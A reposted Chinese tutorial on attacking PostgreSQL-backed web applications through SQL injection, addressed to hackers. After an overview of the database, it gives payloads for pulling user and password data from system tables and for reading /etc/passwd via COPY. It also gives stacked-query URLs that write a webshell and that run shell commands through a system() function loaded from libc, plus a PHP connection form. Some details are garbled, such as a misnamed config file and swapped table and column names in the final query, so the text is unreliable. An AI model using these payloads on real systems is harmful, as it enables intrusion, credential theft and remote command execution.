详解如何用postgresql注入

前端之家收集整理的这篇文章主要介绍了详解如何用postgresql注入前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。

Postgresql是一个强大开源的关系数据库系统.它经过了15年多的开发历程,一个经得起考验的体系结构,在可靠性、数据完整性和正确性方面赢得了极好的声誉.它运行在所有主要的操作系统上,包括Linux、UNIX (AIX,BSD,HP-UX,SGI IRIX,Mac OS X,Solaris,Tru64)和Windows. 它是完全符合ACID原则,完全支持外键、联合、视图、触发器和存储过程(多种语言)。

它包含了sql92和sql99的大部分数据类型,包括INTEGER,NUMERIC,BOOLEAN,CHAR,VARCHAR,DATE,INTERVAL和TIMESTAMP.它也支持存储二进制巨型对象,包括图片、声音和视频.它有本地编程接口,C/C++、Java、.Net、Perl、Python、Ruby、Tcl、ODBC,其中还有特别的文档.Postgresql以执行标准为傲。

它强有力地实现了ANSI-sql 92/99标准.它充分支持查询(包括FROM子句的子选择) 、提交读(read-committed)、序列化事务隔离级别.虽然Postgresql有一个完全关系系统编目(catalog)它自己支持数据库多重纲要(schema),它的编目也可以通过sql标准定义的纲要信息(Information Schema)来存取.数据完整性功能包括(复合)主键、限制和级联更新/删除的外键、CHECK约束、UNIQUE约束和非空约束.它也有许多扩展和高级功能.其中有为了方便按顺序自动增加列值,LIMIT/OFFSET允许返回部分结果集.Postgresql支持符合、惟一、局部和函数索引,可以使用B-tree,R-tree,hash,或者GiST存储方法中的任一个。

安装

1.windows下:在官网(http://www.postgresql.org)下载windows下安装包,目前最新版本是8.3的,这里需要注意下,安装Postgresql时会在系统用户添加一个postgres用户,而且在windows下的Postgresql密码自带有类似于安全策略的东西,设置密码是需要复杂度和长度的限制.安装好后,需要配置系统环境变量,把../Postgresql/bin添加到系统环境变量,这样的话,可以直接在cmd中执行psql(类似于MysqL在windows下的MysqL.exe)。

2.*nix下安装:可以到官网下载相应的安装包或者在线安装,安装过程不会出现设置密码这个步骤,默认密码是空,使用psql的时候需要切换postgres用户登录就可以了。

基本语法

既然是数据库当然遵循sql语言,create、insert、update等被称为PL/Pgsql,但不是很明确,一个数据库的语法太多了,只说下对小黑们有用的几个语法。

1.注释、结束标记、连接符
a.Postgresql既然遵循sql语言,当然支持--注释;
b.Postgresql支持/*和/**/注释,这点类似于MysqL;
c.Postgresql数据库使用psql的时候,需要在命令后加上;(分号)或者是/g来表示语句已经结束以执行查询.
d.Postgresql是采用||符号来连接字符串的,注意使用^,小心|被转义。

2.自动匹配
Postgresql不像MysqL能够自动匹配字段,这点类似于oracle,所以在注入的时候要注意下,而且默认情况下是支持union查询的;

3.连接Postgresql

默认情况下是不给外连的,如果想远程管理Postgresql数据库的话,需要修改../Postgresql/data/pg_bha.conf文件,请参考 Postgresql学习手册.Postgresql默认用户是postgres(类似于MysqL的root),默认端口是5432,默认系统库是postgres。

使用psql -h ip -d dataname -p port -U username,这里注意-U参数是大写,如果是本机采用默认安装的话,直接使用psql -U postgres后会提示输入密码,正确输入密码后会出现postgres=#的字符(类似于MysqL中的MysqL>),就可以正常使用psql了。

/? 显示pgsql命令的说明
/h 显示sql命令的说明
/q 是退出
/l 是现实系统中所有的数据库

4.pgAdmin III和PHPPgAdmin
a.pgAdmin III是Postgresql自带的界面化数据库管理程序,可以查询Postgresql数据库中所有域、函数、序列、数据表结构及相关属性、触发器函数、视图等。

b.PHPPgAdmin看名字就知道类似MysqLPHPMyAdmin,是使用PHP开发的网页版数据库管理程序,功能非常强大,使用过PHPMyAdmin的朋友 都知道PHPMyAdmin的强大,PHPPgAdmin针对Postgresql数据库一样强大。

注入Postgresql

既然Postgresql是RDBMS,所以系统中所有数据库的结构会保存系统库中,所以注入的时候就相对比较方便。由于注释方式和MysqL是一样,如何判断是什么数据库?关于这点我也没有一个标准的答案,我想可以扫描5432端口(如何web和库没有分离的情况下),使用version()函数的返回结果来判断,直接使用查询语句如select * from pg_class/select * from pg_group的返回结果来判断数据库类型.由于Postgresql的目录页存在information_schema,我手上也没有Postgresql数据库的注射点,所以我也不知道能不能使用select schema_name from information_schema_schemata来判断,不好意思,关于使用information_schema只是我的想法,有条件的朋友验证下。

介绍下Postgresql中内置函数、表和视图在入侵的应用。
current_database() 当前数据库名字
session_user 会话用户 |
current_user 目前执行环境中的用户名 |这三个函数调用时候不需要加()
user 和session_user一样 |
inet_client_port() 远程端口
cast(sourcetype AS targettype) 定义类型转换
current_setting() 以查询形式获取setting_name 设置的当前值
convert() 编码转换
pg_stat_user_tables 存放系统所有表名的视图,关键字段是relname,使用select relname from pg_stat_user_tables limit offset,1 来达到逐个读取表名的目的
pg_stat_all_tables 和pg_stat_all_tables视图功能一样
pg_shadow 看到shadow大家是否想到/etc/shadow,此表包含数据库用户的信息,关键字段username、passwd和usesuper(超级用户的意思),不过此表被做了权限设置
pg_user 这个表结构和pg_shadow一样,不过此表的全局可读,passwd字段可能被清空或者加密
pg_group 定义组以及哪些用户属于哪个组的信息,关键字段groname
information_schema.columns 这个目录对象中保存了所有的字段,关键字段是column_name,使用select column_name from information_columns where table_name=tablename limit offset,1这样就可以达到读取每个表名的字段

文件

首先需要建立一个表,然后copy文件内容到表中,在读取表内容,思路是这样的
create table read (line text);
copy read from '/etc/passwd';alter table read add id serial--
select * from read;
drop read;
思路就是这样的,具体怎么使用就看大家自己发挥了(encode,^_^)

从Postgresql 8.2后加入了pg_file_read(text,text,bool)和pg_file_write(text,bool),看名字就应该知道是干什么用的吧,大家自己去挖掘吧!
<?PHP

if(empty($_GET['action']))
{

?>
<form action="?action=connect" method=POST>
<table>
<tr><td>pghost:</td><td><input type="text" name="pghost" size="30" value="127.0.0.1"></td></tr>
<tr><td>pgport:</td><td><input type="text" name="pgport" size="30" value="5432" ></td></tr>
<tr><td>dbname:</td><td><input type="text" name="pgdbname" size="30" value="postgres"></td></tr>
<tr><td>username:</td><td><input type="text" name="pgusername" size="30" value="postgres"></td></tr>
<tr><td>password:</td><td><input type="text" name="pgpassword" size="30" value=""></td></tr>
<tr><td> </td><td><input type="submit" name="submit" value="connect"> <input type="reset" name="reset" value="reset"></td></tr>
</form>
<p>
<?PHP
exit;
}

if(!empty($_GET['action']))//连接postgresql
{
if(!empty($_POST['pghost']))
$_SESSION['pghost']=$_POST['pghost'];
if(!empty($_POST['pgport']))
$_SESSION['pgport']=$_POST['pgport'];
if(!empty($_POST['pgdbname']))
$_SESSION['pgdbname']=$_POST['pgdbname'];
if(!empty($_POST['pgusername']))
$_SESSION['pgusername']=$_POST['pgusername'];
if(!empty($_POST['pgpassword']))
$_SESSION['pgpassword']=$_POST['pgpassword'];
$dbconn_string = "host={$_SESSION['pghost']} port={$_SESSION['pgport']} dbname={$_SESSION['pgdbname']} user={$_SESSION['pgusername']} password={$_SESSION['pgpassword']}";
$dbconn=pg_connect($dbconn_string);

if(!$dbconn)
{
die('Failed linking to the server,please check <a href="javascript:history.back()">reset</a>' );
}
else
echo '^_^ connected successfully and the status is '.pg_connection_status($dbconn).'<br><br>';
}

如何获得webshell
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);

http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$$$);


http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;

如何读文件
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
http://127.0.0.1/postgresql.php?id=1;select * from myfile;

执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
当然,这些的postgresql数据库版本必须大于8.X。

创建一个system的函数
CREATE FUNCTION system(cstring) RETURNS int AS ’/lib/libc.so.6’,’system’ LANGUAGE ’C’ STRICT

创建一个输出表:
CREATE TABLE stdout(id serial,system_out text)

执行shell,输出输出表内:
SELECT system(’uname -a > /tmp/test’)

copy 输出内容到表里面;
COPY stdout(system_out) FROM ’/tmp/test’

输出表内读取执行后的回显,判断是否执行成功

SELECT system_out FROM stdout

下面是测试例子

/store.PHP?id=1; CREATE TABLE stdout(id serial,system_out text) -- /store.PHP?id=1; CREATE FUNCTION system(cstring) RETURNS int AS ’/lib/libc.so.6’,’system’ LANGUAGE ’C’STRICT --/store.PHP?id=1; SELECT system(’uname -a > /tmp/test’) --/store.PHP?id=1; COPY stdout(system_out) FROM ’/tmp/test’ --/store.PHP?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--

猜你在找的Postgre SQL相关文章